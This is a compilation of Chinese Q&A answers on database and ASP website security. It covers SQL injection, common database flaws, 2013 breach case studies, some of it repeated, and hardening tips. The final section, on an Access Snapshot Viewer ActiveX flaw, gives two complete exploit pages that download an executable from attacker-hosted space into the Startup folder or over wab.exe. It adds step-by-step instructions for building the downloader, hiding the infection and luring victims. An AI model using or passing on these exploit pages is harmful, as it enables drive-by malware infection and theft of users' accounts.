Ⅰ 怎麼防止用戶下載我的資料庫
常說的是利用sql注入漏洞來下載資料庫,
解決方法是過濾用戶提供的sql語句參數,過濾掉有影響的參數,
另一個是把資料庫改名為不規則的名字,避免被猜中(access資料庫),
比如不要使用mydatabase這么簡單的名字作為資料庫,可以是哦能夠沒;
dsfa234256546ladfjl作為資料庫名字,這樣可以減少被猜中的機會
如果想詳細了解這方面的內容,可以搜索
「sql注入漏洞」
即可找到相關的介紹
Ⅱ 最常見的資料庫安全漏洞
無論如何,數據泄露總是破壞性的;但更糟的是,要怎麼向受影響的用戶、投資人和證監會交代呢?一家公司上千萬用戶的個人數據,總不會自己長腳跑到黑市上躺著被賣吧?於是,在各種監管機構找上門來問一些很難堪的問題之前,北大青鳥http://www.kmbdqn.cn/帶大家還是來看看這幾個最常見的資料庫安全漏洞吧。
資料庫安全重要性上升
只要存儲了任何人士的任意個人數據,無論是用戶還是公司員工,資料庫安全都是重中之重。然而,隨著黑市對數據需求的上升,成功數據泄露利潤的上漲,資料庫安全解決方案也就變得比以往更為重要了。尤其是考慮到2016年堪稱創紀錄的數據泄露年的情況下。
身份盜竊資源中心的數據顯示,美國2016年的數據泄露事件比上一年增長了40%,高達1,093起。商業領域是重災區,緊隨其後的是醫療保健行業。政府和教育機構也是常見目標。
常見資料庫漏洞
1.部署問題
這就是資料庫安全版的博爾特一蹬出起跑器就被鞋帶絆倒。資料庫經過廣泛測試以確保能勝任應該做的所有工作,但有幾家公司肯花時間保證資料庫不幹點兒什麼不應該乾的事兒呢?
解決辦法:這個問題的解決辦法十分明顯:部署前做更多的測試,找出可被攻擊者利用的非預期操作。
2.離線伺服器數據泄露
公司資料庫可能會託管在不接入互聯網的伺服器上,但這並不意味著對基於互聯網的威脅完全免疫。無論有沒有互聯網連接,資料庫都有可供黑客切入的網路介面。
解決辦法:首先,將資料庫伺服器當成聯網伺服器一樣看待,做好相應的安全防護。其次,用SSL或TSL加密通信平台加密其上數據。
3.錯誤配置的資料庫
有太多太多的資料庫都是被老舊未補的漏洞或默認賬戶配置參數出賣的。個中原因可能是管理員手頭工作太多忙不過來,或者因為業務關鍵系統實在承受不住停機檢查資料庫的損失。無論原因為何,結果就是這么令人唏噓。
解決辦法:在整個公司中樹立起資料庫安全是首要任務的氛圍,讓資料庫管理員有底氣去花時間恰當配置和修復資料庫。
4.SQL注入
SQL注入不僅僅是最常見的資料庫漏洞,還是開放網頁應用安全計劃(OWASP)應用安全威脅列表上的頭號威脅。該漏洞可使攻擊者將SQL查詢注入到資料庫中,達成讀取敏感數據、修改數據、執行管理操作乃至向操作系統發出指令等目的。
解決辦法:開發過程中,對輸入變數進行SQL注入測試。開發完成後,用防火牆保護好面向Web的資料庫。
Ⅲ 最近幾年資料庫泄漏事件
泄露事故統計數字正在逐步下降,但數據仍然面臨著由資料庫、應用以及終端保護不當所引發的嚴重風險。
從多個角度來看,2013年的數據泄露趨勢已經得到有效扼制,這對於安全行業來說當然是個好消息。不同於過去四到五年,今年的記錄當中不再充斥著大型資料庫泄露所導致的數以千萬計個人身份信息的外流。根據隱私權信息交流中心的調查,本年度公開報道的泄露事故數量及記錄在案的泄露事故數量雙雙呈下降趨勢。去年同期,得到確切統計的記錄泄露數量已經達到約278萬條,漏洞報告則為637份。而在今年,目前為止記錄在案的泄露事故約為107萬條,漏洞報告則為483份。這充分證明整個安全行業在合規性與安全最佳實踐方面所迎來的進步——然而這樣的戰績與理想目標相比仍然相去甚遠。
在對年初至今的數字進行比較時,我們發現記錄在案的泄露事故數量大幅降低了61.7%,然而報告提及的泄露事故數量則僅降低了24.2%。這表明泄露事故仍然快速發生——只不過如今的犯罪活動及違規事件開始逐步擴散而非集中於一點。泄露事件影響范圍更小,而且根據安全業內人士的說法,此類惡意活動的目標也更為廣泛。現在犯罪分子開始更多地竊取IP或者其它數字資產,由此引發的損失可能比客戶記錄本身更為嚴重——同時這也更加難以量化,無法提供頭條新聞所必需的統計結果。
通過對今年發生的泄露事故的深入鑽研,我們發現安全行業明顯仍有大量工作要做。2013年的追蹤記錄證明,有價值資料庫仍然沒有受到嚴格保護與加密、應用程序仍然存在大量安全漏洞、用戶們則仍然能夠從敏感資料庫中下載大量信息並將其保存在缺乏保護的終端當中。為了幫助大家更好地理解當前安全形勢,我們選取了幾項最具代表意義的實例,希望各位能夠從中吸取可資借鑒的教訓。
當事企業: CorporateCarOnline.com
泄露統計: 850,000份記錄被盜
事故細節:作為全美最具知名度的專業體育、娛樂外加五百強企業,CorporateCarOnline.com擁有大量用戶個人資料、信用卡號碼以及其它個人身份信息,然而由於其開發出的全球豪車租賃SaaS資料庫解決方案將全部信息以純文本形式儲存,最終導致這一切成為犯罪分子的囊中之物。名單中涉及不少大牌,包括湯姆·漢克斯、湯姆·達施勒以及唐納德·特朗普等。
經驗教訓:最重要的教訓在於認清這樣一個現實:面對極具價值的財務與社會工程信息,攻擊者們會爆發出極為可怕的技術能量。根據KrebsOnSecurity.com網站的調查,目前遭遇過違規活動的美國運通卡當中有四分之一為高額度甚至無限額度卡片,而且企業間諜分子或者娛樂小報記者也希望通過這類個人信息挖掘到有價值結論。與此同時,該公司在管理收支賬目時完全沒有考慮過信息安全性,甚至從未嘗試採取任何最基本的加密措施。
當事企業: Adobe
泄露統計: 約三百萬個人身份信息、超過1.5億用戶名/密碼組合以及來自Adobe Acrobat、ColdFusion、ColdFusion Builder外加其它未說明產品的源代碼慘遭竊取。
事故細節: 自最初的違規事件發生之後,接踵而來的更多攻擊活動持續了一個多月之久,並最終導致了此次重大事故的發生。目前情況已經明確,Adobe正在努力恢復其失竊的大量登錄憑證信息——更令人驚訝的是,連其產品源代碼也一並泄露。
經驗教訓: 通過Adobe遭遇的這一輪震驚世界的攻擊活動,我們不僅切身感受到攻擊者在企業網路中建立根據地並奪取了整套業務儲備控制權後所能帶來的損害,同時也應學會在考慮將供應商引入軟體供應鏈之前、考察對方在安全領域營造出了怎樣的企業生態。作為此次泄露事故的後續影響,其潛在後果恐怕在很長一段時間內都無法徹底消除。
當事企業: 美國能源部
泄露統計: 53000位前任及現任能源部員工的個人身份信息遭到竊取
事故細節: 攻擊者將矛頭指向了DOEInfo——該機構利用ColdFusion所打造的、已經棄之不用的CFO辦公室公開訪問系統。能源部官員表示,此次泄露事故只限於內部員工的個人身份信息。
經驗教訓: 我們從中應該吸取兩大教訓。首先,安裝補丁過去是、現在是、未來也將一直是最為重要的安全任務。其次,各機構必須通過重新審視與敏感資料庫相對接的系統最大程度減少攻擊面,保證只向公眾開放必要的網站。
當事企業: Advocate Medical Group
泄露統計: 四百萬病人記錄遭到竊取
事故細節: 僅僅由於犯罪分子從辦公室里偷走了四台由該公司擁有的計算機,最終導致了這起四百萬病人記錄丟失的事故——公司官方將此稱為自2009年衛生部強制要求通告安全事故以來、美國發生過的第二大醫療信息泄露案件。
經驗教訓: 醫療行業的數據泄露事故在2013年的違規披露名單當中一直占據主導,但這一次的案件造成的影響顯然特別惡劣。僅僅由於一台物理計算設備失竊就最終導致從上世紀九十年代至今的病人記錄泄露,這充分暴露了該公司在物理安全、終端安全、加密以及數據保護等各個方面的全線失誤。需要強調的是,終端設備被盜與丟失在醫療行業中已經屢見不鮮。現在這些機構可能需要盡快思考終端設備到底能夠下載並保存多少來自中央資料庫的信息。
Ⅳ 北京北大青鳥:最常見的資料庫安全漏洞
無論如何,數據泄露總是破壞性的;但更糟的是,要怎麼向受影響的用戶、投資人和證監會交代呢?一家公司上千萬用戶的個人數據,總不會自己長腳跑到黑市上躺著被賣吧?於是,在各種監管機構找上門來問一些很難堪的問題之前,北大青鳥http://www.kmbdqn.cn/帶大家還是來看看這幾個最常見的資料庫安全漏洞吧。
資料庫安全重要性上升只要存儲了任何人士的任意個人數據,無論是用戶還是公司員工,資料庫安全都是重中之重。
然而,隨著黑市對數據需求的上升,成功數據泄露利潤的上漲,資料庫安全解決方案也就變得比以往更為重要了。
尤其是考慮到2016年堪稱創紀錄的數據泄露年的情況下。
身份盜竊資源中心的數據顯示,美國2016年的數據泄露事件比上一年增長了40%,高達1,093起。
商業領域是重災區,緊隨其後的是醫療保健行業。
政府和教育機構也是常見目標。
常見資料庫漏洞1.部署問題這就是資料庫安全版的博爾特一蹬出起跑器就被鞋帶絆倒。
資料庫經過廣泛測試以確保能勝任應該做的所有工作,但有幾家公司肯花時間保證資料庫不幹點兒什麼不應該乾的事兒呢?解決辦法:這個問題的解決辦法十分明顯:部署前做更多的測試,找出可被攻擊者利用的非預期操作。
2.離線伺服器數據泄露公司資料庫可能會託管在不接入互聯網的伺服器上,但這並不意味著對基於互聯網的威脅完全免疫。
無論有沒有互聯網連接,資料庫都有可供黑客切入的網路介面。
解決辦法:首先,將資料庫伺服器當成聯網伺服器一樣看待,做好相應的安全防護。
其次,用SSL或TSL加密通信平台加密其上數據。
3.錯誤配置的資料庫有太多太多的資料庫都是被老舊未補的漏洞或默認賬戶配置參數出賣的。
個中原因可能是管理員手頭工作太多忙不過來,或者因為業務關鍵系統實在承受不住停機檢查資料庫的損失。
無論原因為何,結果就是這么令人唏噓。
解決辦法:在整個公司中樹立起資料庫安全是首要任務的氛圍,讓資料庫管理員有底氣去花時間恰當配置和修復資料庫。
4.SQL注入SQL注入不僅僅是最常見的資料庫漏洞,還是開放網頁應用安全計劃(OWASP)應用安全威脅列表上的頭號威脅。
該漏洞可使攻擊者將SQL查詢注入到資料庫中,達成讀取敏感數據、修改數據、執行管理操作乃至向操作系統發出指令等目的。
解決辦法:開發過程中,對輸入變數進行SQL注入測試。
開發完成後,用防火牆保護好面向Web的資料庫。
Ⅳ 請教SEO高人們
1、用戶名與口令被破解
攻擊原理:用戶名與口令,往往是黑客們最感興趣的東西,如果被通過某種方式看到源代碼,後果是嚴重的。防範技巧:涉及用戶名與口令的程序最好封裝在伺服器端,盡量少在ASP文件里出現,涉及與資料庫連接的用戶名與口令應給予最小的許可權。出現次數多的用戶名與口令可以寫在一個位置比較隱蔽的包含文件中。如果涉及與資料庫連接,在理想狀態下只給它以執行存儲過程的許可權,千萬不要直接給予該用戶修改、插入、刪除記錄的許可權。
2、驗證被繞過
攻擊原理:現在需要經過驗證的ASP程序大多是在頁面頭部加一個判斷語句,但這還不夠,有可能被黑客繞過驗證直接進入。
防範技巧:需要經過驗證的ASP頁面,可跟蹤上一個頁面的文件名,只有從上一頁面轉進來的會話才能讀取這個頁面。
3、inc文件泄露問題
攻擊原理:當存在ASP的主頁正在製作且沒有進行最後調試完成以前,可以被某些搜索引擎機動追加為搜索對象。如果這時候有人利用搜索引擎對這些網頁進行查找,會得到有關文件的定位,並能在瀏覽器中查看到資料庫地點和結構的細節,並以此揭示完整的源代碼。
防範技巧:程序員應該在網頁發布前對它進行徹底的調試;安全專家則需要加固ASP文件以便外部的用戶不能看到它們。首先對.inc文件內容進行加密,其次也可以使用.asp文件代替.inc文件使用戶無法從瀏覽器直接觀看文件的源代碼。inc文件的文件名不要使用系統默認的或者有特殊含義容易被用戶猜測到的名稱,盡量使用無規則的英文字母。
4、自動備份被下載
攻擊原理:在有些編輯ASP程序的工具中,當創建或者修改一個ASP文件時,編輯器自動創建一個備份文件,比如:UltraEdit就會備份一個.bak文件,如你創建或者修改了some.asp,編輯器會自動生成一個叫some.asp.bak文件,如果你沒有刪除這個bak文件,攻擊者可以直接下載some.asp.bak文件,這樣some.asp的源程序就會被下載。
防範技巧:上傳程序之前要仔細檢查,刪除不必要的文檔。對以BAK為後綴的文件要特別小心。
5、特殊字元
攻擊原理:輸入框是黑客利用的一個目標,他們可以通過輸入腳本語言等對用戶客戶端造成損壞;如果該輸入框涉及數據查詢,他們會利用特殊查詢語句,得到更多的資料庫數據,甚至表的全部。因此必須對輸入框進行過濾。但如果為了提高效率僅在客戶端進行輸入合法性檢查,仍有可能被繞過。
防範技巧:在處理類似留言板、BBS等輸入框的ASP程序中,最好屏蔽掉HTML、javascript、VBScript語句,如無特殊要求,可以限定只允許輸入字母與數字,屏蔽掉特殊字元。同時對輸入字元的長度進行限制。而且不但要在客戶端進行輸入合法性檢查,同時要在伺服器端程序中進行類似檢查。
6、資料庫下載漏洞
攻擊原理:在用Access做後台資料庫時,如果有人通過各種方法知道或者猜到了伺服器的Access資料庫的路徑和資料庫名稱,那麼他也能夠下載這個Access資料庫文件,這是非常危險的。
防範技巧:
(1)為你的資料庫文件名稱起個復雜的非常規的名字,並把它放在幾層目錄下。所謂 「非常規」, 打個比方說,比如有個資料庫要保存的是有關書籍的信息, 可不要給它起個「book.mdb」的名字,而要起個怪怪的名稱,比如d34ksfslf.mdb, 並把它放在如./kdslf/i44/studi/的幾層目錄下,這樣黑客要想通過猜的方式得到你的Access資料庫文件就難上加難了。
(2)不要把資料庫名寫在程序中。有些人喜歡把DSN寫在程序中,比如: DBPath = Server.MapPath(「cmddb.mdb」)
conn.Open 「driver={Microsoft Access Driver (*.mdb)};dbq=」 & DBPath
假如萬一給人拿到了源程序,你的Access資料庫的名字就一覽無余了。因此建議你在ODBC里設置數據源,再在程序中這樣寫:
conn.open「shujiyuan」
(3)使用Access來為資料庫文件編碼及加密。首先在「工具→安全→加密/解密資料庫」中選取資料庫(如:employer.mdb),然後按確定,接著會出現「資料庫加密後另存為」的窗口,可存為:「employer1.mdb」。
要注意的是,以上的動作並不是對資料庫設置密碼,而只是對資料庫文件加以編碼,目的是為了防止他人使用別的工具來查看資料庫文件的內容。
接下來我們為資料庫加密,首先打開經過編碼了的 employer1.mdb,在打開時,選擇「獨占」方式。然後選取功能表的「工具→安全→設置資料庫密碼」,接著輸入密碼即可。這樣即使他人得到了employer1.mdb文件,沒有密碼他也是無法看到 employer1.mdb中的內容。
7、防範遠程注入攻擊
這類攻擊在以前應該是比較常見的攻擊方式,比如POST攻擊,攻擊者可以隨便的改變要提交的數據值已達到攻擊目的.又如:COOKIES 的偽造,這一點更值得引起程序編寫者或站長的注意,不要使用COOKIES來做為用戶驗證的方式,否則你和把鑰匙留給賊是同一個道理.
比如: If trim(Request. cookies ("uname"))="fqy" and Request.cookies("upwd") =」fqy#e3i5.com」 then
……..more………
Ⅵ Access資料庫的漏洞有那些哪位高手指教一下!
有網頁自己看也行..看我發的也行: http://www.chinaz.com/Program/Access/0Z93KC2008.html Access漏洞威脅的潛在人群十分巨大。目前已經有不少利用該漏洞的惡意網站了,一旦用戶訪問這些頁面就會被植入木馬下載器,這些木馬下載器成功進入用戶系統並執行後,就會下載其他的惡意程序木馬,試圖盜取用戶的QQ、網游等賬號,危險不言而喻。 本次Access漏洞除Office2007版本外,在以前的版本中廣泛存在。由於用戶在安裝Office的時候很多都是選擇的默認安裝,附帶也安裝了Access,所以漏洞威脅的用戶群數量非常的巨大。 HTTP GET功能導致漏洞出現 本次的Access漏洞的全名稱為「Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞」,是一個ActiveX控制項漏洞。該漏洞存在於snapview.ocx控制項中,出現的原因是因為該控制項具有HTTP GET功能,這個功能可以從指定的網址下載指定的文件。 黑客要利用該漏洞,先要特製一個惡意網站引誘用戶訪問。當用戶打開該網頁的時候,惡意網址就賦給了HTTP GET功能,該功能被激活後就偷偷從惡意網址下載病毒,這樣病毒就可以神不知鬼不覺地進入用戶的系統中,威脅用戶的各種賬號和密碼。受這個漏洞影響的Access版本有2003、2002、2000。 Access漏洞解決方案 方案1:現在已經有了該漏洞的補丁了,請大家趕快到 http://www.shudoo.com/bzsoft 下載。此外,我們還可以在「工具→Internet選項→安全」中,選擇「Internet」圖標,然後將下面的安全級別中設置為「高」(圖3),這樣可以有效地阻止網頁木馬入侵。 圖3 方案2 :將以下內容復制在記事本中,另存為1.reg,然後雙擊導入注冊表也可以堵上漏洞。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 目前黑客利用Access漏洞的主要方式 方式1:寫入啟動項 先申請一個免費的Web空間,用Mini downloader by SEC配置網頁木馬,在「URL」處輸入網頁木馬地址,再點擊「Creat」,又再彈出窗口中將文件保存為test.exe,這樣就網頁木馬就配置好了。 接著將test.exe上傳到先前申請的免費空間裡面,病毒地址就是:http://(這里是申請的空間地址)/test.exe 。將以下漏洞的利用代碼復制粘貼到新建的記事本里,另存為test.html。 <html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object> <script language='javascript'> var buf1 = 『http://(這里是申請的空間地址)/test.exe'; var buf2 = 『C:/Documents and Settings/All Users/「開始」菜單/程序/啟動/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; </script> </html> 最後將test.html上傳到空間里,得到病毒的訪問地址:http://(這里是空間地址)/test.html。做到這步,剩下的工作就是傳播網址引誘用戶訪問了。當用戶訪問該網頁時就會中招,用戶的電腦會在啟動項里出現test.exe文件。 點評: 這種方式有個缺點,就是有些安全軟體會提示有程序寫入啟動項。 方式2:不寫入啟動項 將以下代碼復制到新建的記事本中,另存為test.html上傳到空間即可。當用戶訪問該網頁時也會中招,不過啟動項里沒有test.exe文件,用戶無法察覺自己中毒了。 <html> <body> <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "C:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://(這里是申請的空間地址)/test.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } } </script> </body> </html> 點評: 這種方式無需寫入啟動項,這樣安全軟體就不會有任何提示了,在用戶訪問惡意頁面的時候直接中馬,使用戶中馬的概率更高。